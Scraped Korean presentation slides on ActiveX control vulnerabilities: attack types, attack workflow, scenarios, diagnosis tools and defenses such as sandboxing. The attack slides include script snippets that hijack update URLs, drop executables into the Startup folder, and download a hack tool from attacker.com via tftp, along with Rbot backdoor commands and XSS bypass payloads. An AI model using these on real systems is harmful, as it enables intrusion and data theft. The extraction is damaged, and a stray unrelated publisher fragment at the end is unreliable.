ActiveX 취약점 공격 및 방어 기법

Size: px

Start display at page:

Download "ActiveX 취약점 공격 및 방어 기법"

미란 독고
5 years ago
Views:

1 - 사례위주로살펴본 ActiveX 취약점공격및방어기법 Copyright 2004~2006 by VMCraft, Inc. No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means electronic, mechanical, photocopying, recording, or otherwise without the permission of VMCraft, Inc. 1

2 I. ActiveX 컨트롤취약점공격사례 ActiveX 컨트롤정의 국내 ActiveX 컨트롤현황 공격사례 -2-

3 ActiveX 컨트롤취약점공격사례 정의 ActiveX 컨트롤이란? 인터넷익스플로러의기능을확장하기위해 MS 가제공하는기능 자바애플릿과는달리사용자 PC 의파일, 레지스트리등의자원에접근가능하다. 문제는일반적인윈도우프로그램과는달리공격자가웹인터페이스를통해언제든지호출가능하다는것이다. <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-"> <PARAM NAME= nam VALUE= 12 > </OBJECT> <script> update.startupdate() </script> ActiveX 컨트롤설치화면 OBJECT tag 및 script 를이용한호출 -3-

4 ActiveX 컨트롤취약점공격사례 현황 국내웹사이트는 ActiveX 컨트롤을많이이용한다. ( 천만명이상이사용하는다수의컨트롤에서취약점발견 ) ActiveX 컨트롤에대한보안성검증절차가없다. 보안프로그램에서조차도취약점이발견된다. 개별회사의문제가아니라 ActiveX 취약점에대한인식과공감대형성이부족해서발생한문제 패치가힘들다. ActiveX (PC, PMS, ) 온라인게임설치프로그램 Push -4-

5 ActiveX 컨트롤취약점공격사례 Is your PC really safe? -5-

ActiveX 컨트롤취약점공격사례 애드웨어 / 웜배포 사례 1 2002 년이후발견되는애드웨어의상당수는 ActiveX 나 IE 의취약점이용

6 ActiveX 컨트롤취약점공격사례 애드웨어 / 웜배포 사례 년이후발견되는애드웨어의상당수는 ActiveX 나 IE 의취약점이용 취약점을이용하기때문에 확인 버튼을누르지않아도자동설치 정상적인상황 취약점공격 설치여부를사용자에게묻는다. 취약점을이용해자동으로설치된다. -6-

7 ActiveX 컨트롤취약점공격사례 중국발해킹 사례 2 웹서버해킹후해킹툴 / 트로이목마배포 배포되는트로이목마는 IE ActiveX 컨트롤취약점을이용해자동으로 PC 에설치 웹서버해킹 숨겨진스크립트 -7-

8 ActiveX 컨트롤취약점공격사례 기업임직원 PC 해킹후기밀정보추출 사례 3 내부직원에게메일발송 Q&A 게시판등에글쓰기 해당글을읽는순간공격자는해당 PC 의권한획득 메일시스템이용 BOT 설치 Q&A 게시판이용 -8-

9 ActiveX 컨트롤취약점공격사례 2005 년인터넷뱅킹용 ActiveX 컨트롤취약점사례 사례 4 대부분의은행에서배포하는 ActiveX 컨트롤에취약점존재 인터넷뱅킹이용자수 3000 만명이상 국내대부분의 PC 가국내외해커에게해킹가능했던상황 공격자가취약점을이용해 remote shell 획득 -9-

10 II. 취약점유형 자동업데이트기능관련 File operation 기능관련 이외의시스템자원접근 Advanced topic Cross zone or Cross domain Buffer overflow -10-

11 취약점유형 유형 1 자동업데이트기능관련취약점 업데이트서버 URL 을조작해공격자의해킹툴이설치되게함 업데이트서버 URL 조작 <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904-4BC88E9CDE79"> </OBJECT> <script> </script> update.updateurl = " update.startupdate(); <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904-4BC88E9CDE79"> </OBJECT> <script> </script> update.updateurl = " update.startupdate(); -11-

12 취약점유형 유형 2 File read / write method 이용 File operation 기능을우회하여임의의경로에있는임의의파일을읽고쓸수있음 File File read/write method 이용 <OBJECT ID= mymusic" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904"> </OBJECT> 저장경로 c:\program files\mymusic\data\big.gif <script> Mymusic.SetBannerImage( ); </script> 저장경로 c:\documents and Settings\All users\ 시작메뉴 \ 프로그램 \ 시작프로그래 \big.bat <OBJECT ID= mymusic" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904"> </OBJECT> <script> Mymusic.SetBannerImage( and settings\all users\ 시작메뉴 \ 프로그램 \big.bat ); </script> -12-

13 취약점유형 유형 2 File read / write method 이용 ( 계속 ) 의외로 ReadFile 및 WriteFile 처럼직접적인 method 를직접제공하는 ActiveX 컨트롤도많다. MS 의 ADODB.Stream 도 cross zone 취약점과연계해로컬파일을쓸수있는기능제공 개발자가생각하지못한방식으로 method, property 를호출해우회적으로임의의파일을읽거나쓸수있는방법을찾음 파일쓰기권한을획득한경우기존파일을덮어쓰거나, c:\documents and settings\ All users\ 시작메뉴 \ 프로그램 \ 시작프로그램 폴더에파일을생성해다음번로그인때파일이자동으로실행되게할수있다. -13-

14 취약점유형 유형 3 이외의시스템자원접근을이용한권한획득 SetRegistryValue, GetRegistryValue 등레지스트리를조작할수있는 method StartCommand 와같이특정프로세스를실행할수있는 method => StartCommand( tftp i attacker.com GET hacktool.exe c:\hacktool.exe ); => StartCommand( c:\hacktool.exe ); GetMacAddress 등시스템정보를얻을수있는 method ( MAC, HDD Serial 인증등을위한 control 에서노출되는경우가많음 ) X-internet application -14-

$등압축파일형태로다운로드 압축된파일명 : filename1.exe 압축된파일명 :..\.$

15 취약점유형 유형 4 Advanced topic zip 파일형태로설치되는경우 일반응용프로그램과함께설치되는 ActiveX 컨트롤 SSO 인증우회, Session hijacking 파일을 zip zip 등압축파일형태로다운로드 압축된파일명 : filename1.exe 압축된파일명 :..\..\..\..\documents and settings\ all users\ 시작메뉴 \ 프로그램 \ Filename1.exe -15-

16 취약점유형 유형 5 Cross zone or Cross domain 관련취약점 보안영역 내컴퓨터 인트라넷 인터넷 파일을 zip zip 등압축파일형태로다운로드 각보안영역별로권한이다름 내컴퓨터 영역은로컬자원에대한접근이가능 인터넷 영역에서 내컴퓨터 영역의권한으로컨트롤을호출하는것이핵심 대부분 Windows 혹은 IE 기본 ActiveX 관련된취약점 -16-

17 취약점유형 유형 5 Cross zone or Cross domain 관련취약점 ( 계속 ) Help Control 취약점예 (MS05-001) Help Control 생성 C:.. ntshared.chm 오픈 해당 page 에 Javascript injection 내컴퓨터영역이므로새로운프로세스실행가능 -17-

18 취약점유형 유형 6 Buffer overflow 유형 소스코드감사, fuzzer 를이용한방법 Method, Property 조작을통한 Buffer overflow <OBJECT ID="update" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9D01F646-E3C6-4F19-A904-4BC88E9CDE79"> <PARAM NAME= pam1 VALUE= AAAAAAAAAAAAAAAAAA AAAAA > </OBJECT> <script> </script> update.updateurl = " update.createmenu( type:aaaaaaaaaaaaaaaaaaaaaa AAAAAAAAA ; -18-

19 III. 공격과정 취약점찾기 함정설치 열람 & 공격성공 백도어설치 기타함정설치방법 TIP -19-

20 공격과정 취약점찾기 ActiveX 컨트롤취약점을찾은후공격용스크립트를작성한다. 시현 :: InstallFile 관련취약점 <script> update_control1.installfile( " "colors.dat"); </script> <script> update_control1.installfile( " "..\\..\\..\\..\\Documents and Settings\\All Users\\ 시작메뉴 \\ 프로그램 \\ 시작프로그램 \\r.exe"); </script> -20-

21 공격과정 취약점찾기 ActiveX 컨트롤취약점을찾은후공격용스크립트를작성한다. 시현 :: StartUpdate 관련취약점 <script> update_control1.updateurl = " update_control1.startupdate(); </script> <script> update_control1.updateurl = " update_control1.startupdate(); </script> -21-

22 공격과정 이메일이용 함정설치 취약점공격용스크립트가숨겨진메일을보낸다. 무작위로수집한메일로발송 정보유출이목적인경우지정된사람에게메일발송 시현 :: 공격용스크립트가숨겨진메일발송 -22-

23 공격과정 열람 & 공격성공 희생자가메일을여는순간백도어프로그램이설치된다. 취약점을공격하는것이므로첨부파일등은실행할필요가없다. 스크립트는희생자에게보이지않으며, 일반적으로희생자는공격사실을모른다. 시현 :: 메일열람 -23-

24 공격과정 백도어실행 공격자는희생자 PC 의제어권을얻는다. PC 내의기밀자료를가져올수있다. 키로깅이가능하다. 사용자화면옅보기가가능하다. 스팸메일및다른 PC 해킹경유지로사용할수있다. 시현 :: 백도어실행 Rbot 형태 -24-

25 공격과정 백도어실행 설치된 Rbot 의주요명령어는다음과같다. 기능 명령어 화면캡쳐명령어실행파일검색파일전송키로깅네트워크스니핑포트스캐닝포트리다이렉션.capture screen c: 화면.bmp.cmd dir.findfile *.doc c:.get c: research top_secret.doc.keylog on.psniff on.scan redirect

26 공격과정 포털사이트게시판 / 카페 / 블로그이용 함정설치 불특정다수에대한공격 게시판이나블로그에스크립트를숨겨두면방문자들의 PC 권한획득가능 최근 gxxxxxpage.com 사이트에서숨겨진스크립트발견 ( ) 게시판 / 블로그이용 -26-

27 공격과정 함정설치 기업게시판이용 고객 Q&A 게시판, 커뮤너티사이트등 기업관리자를목표로한공격 기업고객을목표로한공격 ( 은행, 증권사, 카드사등 ) 기업게시판이용 -27-

28 공격과정 Tip Code injection 고급기법 <script> 나 <object> tag 가들어간글을쓸수없도록막아둔사이트도있다. 이경우 XSS 부분에서이용되는다양한우회기법을활용할수있다. <IFRAME src= height=0 width=0> </frame> <SCRIPT> document.write( <obj + ect> </object ); </script> <IMG SRC="javascript:document.write( )"> <IMG SRC="jav ascript:document.write( )"> <LINK REL="stylesheet" HREF=" <STYLE>@import' ';</STYLE> <DIV STYLE="background-image: url(javascript:document.write( ))"> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> -28-

29 IV. 공격시나리오 금융부문 기업부문 기타부문 -29-

30 공격시나리오 금융부분 직접적인금전적이익을목적으로하는공격빈도증가 해킹기술과범죄조직이결합하는것은전세계적인추세 대규모웜출현및금융시장교란가능성 현재애드웨어 / 스파이웨어기술 ActiveX 취약점을이용한자동설치 웹검색결과컨텐츠조작 Stealth 기법을이용해자신을숨김 신종트로이목마 / 웜출현가능성 피싱기법 범죄조직혹은청소년 국내에는영향이미미 -30-

31 공격시나리오 기업부분 산업스파이 기업내부기밀자료유출 내부의위협 기업내에서사용중인 ActiveX 컨트롤에취약점이존재하면사실상해당기업의 PC 는모두해킹가능 PMS, 안티키로거등필수보안컨트롤에서취약점발견 인트라넷, 문서관리등자체적으로만든컨트롤인더욱심각 외부의위협 임 / 직원이웹서핑중에설치한컨트롤에취약점존재 메신저, 게임, 지도서비스사이트, 언론사이트, 은행사이트등메이저사이트에서배포하는 ActiveX 컨트롤에서다수취약점발견 한 PC 가공격되면해당 PC 를숙주로해내부망침투가능 -31-

32 공격시나리오 기타부분 이외에현재혹은미래에발생할수있는공격 1. 게임아이템해킹 2. 중국발해킹 파밍공격 4. 정보전쟁

33 V. 취약점진단 기본분석 상세분석 Fuzzer 디버깅및디스어셈블리 -33-

34 취약점진단 기본분석 OLEView 를이용한 ActiveX 컨트롤기본정보수집 자사홈페이지에서배포중인 ActiveX 컨트롤확인 ( 보안담당자 ) 자신의 PC 에설치된 ActiveX 컨트롤확인 ( 사용자 ) OLEView 를이용한 TypeLib 분석 Microsoft 사홈페이지에서무료로다운로드가능 (Visual Studio, Resource kit 에도포함되어있음 ) 컨트롤의 method, property 및 help string 을볼수있음 Method 나 property 의이름을보고전체적인아키텍쳐및기능파악 업데이트기능, File operation 기능이있는지확인 -34-

35 취약점진단 상세분석 HTML, JavaScript, VBScript 등실제로컨트롤이호출되는과정분석 소스보기, 웹프록시, 웹디버거, DOM 분석기등이용 DOM 분석툴을이용한분석 DOM 분석툴을이용해 ActiveX 컨트롤뿐만아니라웹페이지를구성하는전체적인요소를한눈에파악하고 History 를관리한다. 소스보기등이막혀있어도원본 HTML 코드를추출할수있다. -35-

36 취약점진단 상세분석 HTML, JavaScript, VBScript 등실제로컨트롤이호출되는과정분석 소스보기, 웹프록시, 웹디버거, DOM 분석기등이용 웹프록시를이용한분석 웹프록시를이용하면 Request, Reponse 를모두조작할수있다. Response 에서 JavaScript 코드자체를수정하거나 <OBJECT> 의생성형태를조작하거나제어할수있다. -36-

37 취약점진단 상세분석 HTML, JavaScript, VBScript 등실제로컨트롤이호출되는과정분석 소스보기, 웹프록시, 웹디버거, DOM 분석기등이용 웹디버거를이용한분석 MS 의스크립트디버거나 Visual InterDev 등웹개발툴을이용한다. 실행도중각종스크립트변수를조작할수있고, Break-point 등의설정이가능하다. Object 를호출할대변수형태로전달되는경우그값을쉽게확인할수있고, 디버깅할수잇다. IE -> 인터넷옵션 -> 고급 -> 스크립트디버깅사용안함 옵션을꺼야한다. -37-

38 취약점진단 COMRaider Fuzzer method, propery 에무작위로값을대입해주로 BoF 형태의취약점찾음 Update, file operation 등의취약점과는달리주소값등을맞춰줘야하며, 실제공격시프로세스가오류를발생시킬확률이있다. Fuzzer 를이용한취약점진단 Fuzzer 를이용하면 BoF, Format string 등전통적인 C/C++ 취약점을쉽게찾을수있다. 확률적으로취약점이발견될수도있고, 발견되지않을수도있다. -38-

39 취약점진단 디버깅 / 디스어셈블 디버거, 디스어셈블러를이용해정교하게분석한다. 주로 Buffer overflow 류의 exception 을발견한후실제공격용 exploit code 를작성할때필요하다. IDA IDA Pro, WinDBG, OllyDbg 등을이용한분석 -39-

40 VI. 대응방안 Vendor 측대응방안 사용자측대응방안 -40-

41 대응방안 Vendor 소스코드수정을통한취약점 1. 취약점분석 보안권고안에따라소스코드수정 패치배포 -41-

42 대응방안 Vendor 소스코드수정을통한취약점 일반적인권고안 특정웹사이트에서만사용되는컨트롤이라면호출될수있는도메인을지정한다. UpdateURL 등은외부에서입력받는것이아니라프로그램내부에가지고있어야한다. 업데이트될파일은전자서명을한후배포하고, 업데이트시전자서명을확인해공격자의악성파일이아닌지확인한다. File operation 이수행되는컨트롤은되도록 Safe for scripting 을제거한다. 파일명등에..,../ 등비정상적인값이없는지확인한다. -42-

43 대응방안 사용자 ActiveX 컨트롤비활성화 추가기능관리 Windows XP Service Pack 2 인경우 ActiveX 비활성화기능을제공한다. IE -> 도구 -> 추가기능관리 기본적으로 ActiveX 나 BHO 등은비활성화상태로두고필요한경우에만활성화한다. 추가기능관리 -43-

44 대응방안 사용자 OS Partitioning 형태의 Virtual machine Sandbox 를이용한다. Real OS File File System System Ex) Ex) C: a.txt C: a.txt File System Network Network System System Object/Registry Object/Registry System System B L I N D Virtual OS Virtual Virtual File File System System Ex) Ex) C: a.txt C: a.txt Sync Virtual Virtual Network Network System System Virtual Virtual Object/Registry Object/Registry System System Client Secure Module Anti-Reverse Anti-Reverse Engineering Engineering En/Decryption En/Decryption Filtering System Filtering System I/O I/O I I N N T T E E R R F F A A C C E E -44-

45 대응방안 Virtual Machine 생성후웹서핑은 Virtual Machine 내에서수행 사용자 최악의경우해킹되어트로이목마가설치되어도가상머신내에서만권한을가지므로기밀자료유출등방어 가상머신내에서웹서핑및프로그램설치등의과정에서애드웨어에감염되어도리얼공간 ( 업무공간 ) 에는영향을주지않는다. 악성코드유입방어 Virtual Machine Real Machine -45-

46 대응방안 사용자 업무환경가상화예 통신사영업점, 지점등의 PC 에대한업무환경가상화 보험설계사, 투자상담사등의노트북업무환경을가상화 영업점 PC 혹은설계사노트북 업무환경가상화예 개인정보유출금지 해킹툴침입금지 업무툴 개인정보 메신저 인트라넷 업무정보 해킹툴 VPN 기업망 Virtual machine Real machine -46-

47 대응방안 사용자 금융어플리케이션가상화예 Secure VM 안은윈도우설치직후의깨끗한환경을제공한다. Secure VM 안의프로세스는리버스엔지니어링공격등에안전하다. 인터넷뱅킹예 -47-

48 대응방안 사용자 금융어플리케이션가상화예 ( 계속 ) 인터넷뱅킹, DRM, 게임등의프로세스를 SecureVM 안에서사용하면외부해킹으로부터보호받을수있다. 금융서비스등특정목표를타켓으로하는웜 / 트로이목마가유포되어도 SecureVM 안은윈도우설치직후의깨끗한상태로유지되므로최후의보루가될수있다. Secure Connect 해킹안심로그인 -48-

49 Demonstration -49-

50 Q & A 브이엠크래프트는고객의보안 향상을위해최선의노력을다하겠습니다. -50-

인디쓔피-IOM핸돜벁닄큐1014pdf, page 59 @ Preflight ( IOM핸돜벁닄큐__1014 )

인디쓔피-IOM핸돜벁닄큐1014pdf, page 59 @ Preflight ( IOM핸돜벁닄큐__1014 ) Publisher: International Organization for Migration 17, route des Morillons 1211 Geneva 19 Switzerland Tel: +41.22.717 91 11 Fax: +41.22.798 61 50 E-mail: hq@iom.int Internet: http://www.iom.int ISBN 978